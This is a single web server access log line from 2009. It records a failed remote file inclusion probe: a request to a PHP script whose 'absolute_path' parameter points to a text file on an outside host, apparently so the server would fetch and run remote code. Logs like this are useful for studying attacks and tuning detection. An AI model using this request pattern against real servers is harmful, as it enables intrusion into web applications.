211.234.107.233 - - [13/Jul/2009:05:20:10 -0400] "GET /logs/access_log.Q109052200/support/mailling/maillist/inc/initdb.php?absolute_path=http://www.fotoplus.su//assets/images/magaz/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
